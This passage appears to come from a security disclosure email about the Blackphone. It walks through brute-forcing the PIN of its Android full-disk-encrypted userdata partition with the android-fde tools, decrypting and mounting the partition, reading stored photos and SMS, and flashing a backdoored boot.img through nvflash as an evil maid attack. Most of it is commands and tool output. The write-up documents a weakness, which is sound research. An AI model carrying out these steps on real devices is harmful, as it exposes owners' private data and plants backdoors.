Académique Documents
Professionnel Documents
Culture Documents
To retrieve it, we will crack this partition with "android-fde" tools (Github link:
https://github.com/sogeti-esec-lab/android-fde) :
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
WAKdump/android-fde/dump_nvtegra/Linux$ cd ../../
WAKdump/android-fde$ cd pydroidfde
WAKdump/android-fde$ python2 bruteforce.py
usage: bruteforce.py [-h] [-d MAXPIN_DIGITS] [-o OUTPUT_KEYFILE]
encrypted_partition header_file
bruteforce.py: error: too few arguments
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
To begin the brute-force, we only need to provide the output keyfile, encrypted_partition and
header_file as follows :
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
WAKdump/android-fde$ python2 bruteforce.py -o keyblackphone ../androidfde/dump_nvtegra/Linux/ROM/userdata.img ../androidfde/dump_nvtegra/Linux/ROM/userdata_footer.img
Magic
: 0xD0B5B1C4
Major Version : 1
Minor Version : 2
Footer Size : 104 bytes
Flags
: 0x00000000
Key Size
: 128 bits
Failed Decrypts: 0
Crypto Type : aes-cbc-essiv:sha256
Encrypted Key : 0x7BEE47CD52489BCCE4CB148D32A0877A
Salt
: 0x0E92933EB21BE7D192D2518A4C9DC2A4
---------------Trying to Bruteforce Password... please wait
Trying passwords from 0 to 100
[+] This partition uses scrypt
[+] scrypt parameters are: N=0xf, r=0x3, p=0x1
Password
: 0000
Derived Key : 0x2FA82E9792A4C3ABE9352FBB4B9C31FD
Derived IV : 0x3F74FAD55977762803B03AC22CF6D47D
Decrypted Key : 0x5B49A4C3FA3971F5DA7A40BC3A6C11BE
[...] Wait until we find the right pin/password
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
When the bruteforce finds the pin/passphrase here is what happens:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[...]
Trying to Bruteforce Password... please wait
[+] This partition uses scrypt
[+] scrypt parameters are: N=0xf, r=0x3, p=0x1
Password
: 20152015
Derived Key : 0x511C4E2CD295F772C099A4332C653973
Derived IV : 0x834A6DC030E58C06F7568FD6B4DE141B
Decrypted Key : 0x81F626D9EBDF5640B6C0CF63C58B28BE
---------------Decrypted data:
00000000: A7 FD 41 4D D6 57 A0 D8 99 63 2D 6C 77 BB 01 D8 ..AM.W...c-lw...
00000010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
Found PIN!: 20152015
Saving decrypted master key to 'keyblackphone'
Done.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The PIN configured by 01net to encrypt the data is "20152015". Now we need to decrypt the
partition using the same"android-fde" tools:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
WAKdump/android-fde$ python2 decrypt.py
usage: decrypt.py [-h] [-p PASSWORD] [-s SECTOR]
encrypted_partition header_file outfile
decrypt.py: error: too few arguments
WAKdump/android-fde$ python2 decrypt.py -p 20152015 ../androidfde/dump_nvtegra/Linux/ROM/userdata.img ../androidfde/dump_nvtegra/Linux/ROM/userdata_footer.img decrypted_userdata.img
Magic
: 0xD0B5B1C4
Major Version : 1
Minor Version : 2
Footer Size : 104 bytes
Flags
: 0x00000000
Key Size
: 128 bits
Failed Decrypts: 0
Crypto Type : aes-cbc-essiv:sha256
Encrypted Key : 0x7BEE47CD52489BCCE4CB148D32A0877A
Salt
: 0x0E92933EB21BE7D192D2518A4C9DC2A4
---------------[+] This partition uses scrypt
[+] scrypt parameters are: N=0xf, r=0x3, p=0x1
Password
: 20152015
Derived Key : 0x511C4E2CD295F772C099A4332C653973
Derived IV : 0x834A6DC030E58C06F7568FD6B4DE141B
Decrypted Key : 0x81F626D9EBDF5640B6C0CF63C58B28BE
---------------~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Then wait until it decrypts the whole "userdata.img" partition...
Once the script has decrypted the data, we can start to mount the "decrypted_userdata.img" file
using the "mount" Linux command for example:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
WAKdump/android-fde$ sudo mount decrypted_userdata.img /mnt
WAKdump/android-fde$ cd /mnt
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Then we are able to see the stored pictures that were encrypted with user data at the begining:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
mnt$ find . -name "IMG*"
./media/0/DCIM/Camera/IMG_20150126_184947.jpg
./media/0/DCIM/Camera/IMG_20150126_184951.jpg
./media/0/DCIM/Camera/IMG_20150126_184954.jpg
./media/0/DCIM/Camera/IMG_20150126_185007.jpg
./media/0/DCIM/Camera/IMG_20150126_185010.jpg
./media/0/DCIM/Camera/IMG_20150126_185014.jpg
./media/0/DCIM/Camera/IMG_20150126_185019.jpg
./media/0/DCIM/Camera/IMG_20150126_185028.jpg
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
But we can also retrieve user SMS :
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
sqlite3 ./data/com.android.providers.telephony/databases/mmssms.db
SQLite version 3.8.8.2 2015-01-30 14:30:45
Enter ".help" for usage hints.
sqlite> select * from SMS;
1|1|06 80 30 73 79||1422294679062|0||1|-1|2|||Salut ! Je t'cris depuis mon super tlphone
scuris||0|0|1
2|1|+33680307379||1422296172000|1422296172000|0|0|-1|1|0||Hello ! Je suis un sms factice
viens me pirater ;)|+33660003000|0|0|0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
And so on.
Evil Maid attack
================
To perform the evil maid attack, we have to download a homemade "boot.img" to the device as
follows:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
WAKdump/android-fde/dump_nvtegra/Linux$ sudo nvflash -r --download 18 evilboot.img
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This way we could install a backdoor that waits for partition to be decrypted, and inject itself in other
process to extract data for example.
Conclusion
==========
No unlock procedure was needed to read or write into the flash.
So once an attacker retrieves a phone, he can backdoor or try to retrieve targeted data using the
decribded bruteforce in this mail.
It's a matter of time, and the complexity will vary depending on password complexity. In the other
hand, the "boot.img" backdooring is a very efficient way, as this partition can be downloaded quickly
to the device (few seconds).